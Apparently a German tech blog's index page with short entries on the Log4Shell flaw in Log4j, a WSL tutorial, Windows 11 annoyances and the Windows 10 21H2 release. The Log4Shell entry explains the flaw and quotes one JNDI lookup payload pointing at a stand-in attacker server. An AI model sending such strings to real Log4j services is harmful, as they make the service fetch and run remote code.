Log4j und die Log4Shell-Lücke (14.12.2021) |
Der Fehler liegt in der "Log4Shell" in der weit verbreiteten Java-Logging-Bibliothek "Log4j". Es lässt sich quasi beliebiger Code ausführen und das dazu noch sehr einfach. In der Java-Welt kommt diese Bibliothek häufig vor, um Prozesse zu protokollieren und etwaige Fehler zu finden. Das Problem dabei ist, dass "Log4Shell" nicht einfach nur schreibt, sondern darüber hinaus versucht den Protokolltext zu interpretieren. Enthält dieser z.B. die Zeichenfolge "${jndi:ldap://angreifer.server.de/a}", dann ist das Kind in den Brunnen gefallen, weil der Dienst den Server "angreifer.server.de" kontaktiert und von diesem ungefragt Java-Code entgegennimmt und ausführt. ![]() |
Tutorial Windows Subsystem for Linux (08.12.2021) |
![]() Kommentare bitte direkt auf der Tutorialseite (hier deaktiviert). |
![]() |
Was bei Windows 11 so richtig nervt (30.11.2021) |
![]() Wir betreiben Windows 11 Pro (21H2) auf einem Notebook mit Intel-Prozessor i7-1065G7 und 32 GB installiertem RAM. Gespeichert wird auf einer WD M2-NVMe SSD. Dabei haben wir das System per „clean install“ aufgesetzt und nicht von Windows 10 ein Upgrade auf 11 durchgeführt. D.h. alles sauber neu installiert, ohne evtl. Reste eines Vorgänger-Systems. ![]() |
Windows 10 21H2 verfügbar (17.11.2021) |
![]() Die Auslieferung erfolgt per Windows-Update an kompatible Maschinen, die Installation muss aber manuell angestossen werden. ![]() |